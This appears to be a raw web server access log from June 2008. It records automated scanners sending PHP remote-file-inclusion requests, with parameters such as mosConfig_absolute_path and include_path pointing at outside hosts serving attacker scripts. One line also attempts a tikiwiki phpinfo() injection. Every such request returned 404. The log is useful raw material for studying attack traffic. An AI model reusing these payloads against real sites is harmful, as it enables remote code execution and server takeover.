72.249.108.180 - - [24/Jun/2008:09:09:23 -0700] "GET /ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:09:39 -0700] "GET /logs/access_080215.log/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.144 - - [24/Jun/2008:09:09:47 -0700] "GET /logs/access_080212.log/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.144 - - [24/Jun/2008:09:09:50 -0700] "GET /logs/access_080201.log/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.20.73.217 - - [24/Jun/2008:09:09:54 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.20.73.217 - - [24/Jun/2008:09:09:55 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:10:15 -0700] "GET /plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:09:10:35 -0700] "GET /logs/access.log/db.php?path_local=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:09:10:35 -0700] "GET /db.php?path_local=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:09:10:35 -0700] "GET /logs/db.php?path_local=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
209.20.73.217 - - [24/Jun/2008:09:10:36 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://h1.ripway.com/jum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.20.73.217 - - [24/Jun/2008:09:10:36 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://h1.ripway.com/jum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:09:10:37 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:09:10:37 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:10:39 -0700] "GET /logs/access_080215.log/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:10:46 -0700] "GET /ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.97.132.101 - - [24/Jun/2008:09:11:24 -0700] "GET /logs/access_080110.log//include.php?path[docroot]=http://crashoveride.altervista.org/help01.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:11:33 -0700] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:11:33 -0700] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:11:35 -0700] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:11:35 -0700] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:12:09 -0700] "GET /logs/access_080326.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:12:09 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:12:09 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.157 - - [24/Jun/2008:09:12:10 -0700] "GET /logs/access_071213.log HTTP/1.0" 200 79346 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:12:11 -0700] "GET /logs/access_080326.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:12:11 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:12:11 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:12:14 -0700] "GET /logs/access_080326.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:12:14 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:12:14 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:12:16 -0700] "GET /logs/access_080326.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:12:16 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:12:16 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:09:12:27 -0700] "GET /logs/access_080215.log/account.php?action=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:09:12:28 -0700] "GET /account.php?action=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:09:12:31 -0700] "GET /logs/account.php?action=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:09:12:47 -0700] "GET /logs/access_080225.log/db.php?path_local=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
208.98.1.12 - - [24/Jun/2008:09:13:03 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.98.1.12 - - [24/Jun/2008:09:13:03 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:13:20 -0700] "GET /logs/access_080327.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:13:21 -0700] "GET /logs/access_080327.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:09:13:39 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:09:13:40 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:13:41 -0700] "GET /logs/access_080327.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:13:50 -0700] "GET /logs/access_080327.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.167.156.20 - - [24/Jun/2008:09:13:54 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [24/Jun/2008:09:13:54 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:14:09 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:14:10 -0700] "GET /logs//components/errors.php?error=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:15:04 -0700] "GET /logs/access_080118.log//components/errors.php?error=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:15:42 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.45.242 - - [24/Jun/2008:09:15:58 -0700] "GET //includes/messages.inc.php?include_path=http://opensourcelegal.org/search/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.45.242 - - [24/Jun/2008:09:15:58 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://opensourcelegal.org/search/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.45.242 - - [24/Jun/2008:09:15:58 -0700] "GET /logs//includes/messages.inc.php?include_path=http://opensourcelegal.org/search/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:16:02 -0700] "GET /logs/access_080215.log//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:16:04 -0700] "GET //components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:16:04 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:16:05 -0700] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.157 - - [24/Jun/2008:09:18:02 -0700] "GET /logs/access_080522.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:18:12 -0700] "GET /logs/access_080131.log//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:18:15 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:18:15 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:18:30 -0700] "GET /logs/access_080326.log/samPHPweb/playlist.php/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:18:30 -0700] "GET /samPHPweb/playlist.php/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:18:30 -0700] "GET /logs/samPHPweb/playlist.php/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.146.38 - - [24/Jun/2008:09:18:30 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://opensourcelegal.org/search/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [24/Jun/2008:09:18:30 -0700] "GET /logs//includes/messages.inc.php?include_path=http://opensourcelegal.org/search/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [24/Jun/2008:09:18:30 -0700] "GET //includes/messages.inc.php?include_path=http://opensourcelegal.org/search/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:18:45 -0700] "GET /logs/access_080326.log/samPHPweb/playlist.php/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:18:45 -0700] "GET /samPHPweb/playlist.php/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:18:46 -0700] "GET /logs/samPHPweb/playlist.php/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:18:54 -0700] "GET /logs/access_080326.log/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:18:55 -0700] "GET /common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:18:55 -0700] "GET /logs/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:19:09 -0700] "GET /logs/access_080423.log/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:09:19:25 -0700] "GET /logs/errors.php?error=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:09:19:25 -0700] "GET /errors.php?error=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:09:19:31 -0700] "GET /logs/errors.php?error=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:09:19:31 -0700] "GET /errors.php?error=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:19:50 -0700] "GET /logs/access_080423.log/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:19:57 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:19:57 -0700] "GET //includes/messages.inc.php?include_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:19:58 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
8.2.208.2 - - [24/Jun/2008:09:20:05 -0700] "GET /logs/errors.php?error=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
8.2.208.2 - - [24/Jun/2008:09:20:05 -0700] "GET /errors.php?error=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:20:19 -0700] "GET /logs/access_080325.log/samPHPweb/playlist.php/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.20.73.217 - - [24/Jun/2008:09:20:24 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:20:34 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:20:34 -0700] "GET //includes/messages.inc.php?include_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:20:34 -0700] "GET /logs//includes/messages.inc.php?include_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.208.32.7 - - [24/Jun/2008:09:20:35 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.208.32.7 - - [24/Jun/2008:09:20:35 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.208.32.7 - - [24/Jun/2008:09:20:35 -0700] "GET //includes/messages.inc.php?include_path=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.208.32.7 - - [24/Jun/2008:09:20:35 -0700] "GET //includes/messages.inc.php?include_path=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.20.73.217 - - [24/Jun/2008:09:20:36 -0700] "GET /logs/access_080215.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:20:47 -0700] "GET /logs/access_080325.log/samPHPweb/playlist.php/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:21:02 -0700] "GET /logs/access_080325.log/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:21:19 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=:http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:21:19 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=:http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:21:19 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=:http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:09:21:38 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:09:21:38 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:09:21:38 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:09:21:38 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:09:21:38 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:09:21:38 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:21:50 -0700] "GET /logs/access_080326.log/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:21:51 -0700] "GET /common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:21:51 -0700] "GET /logs/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:21:58 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:21:58 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:21:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:21:58 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
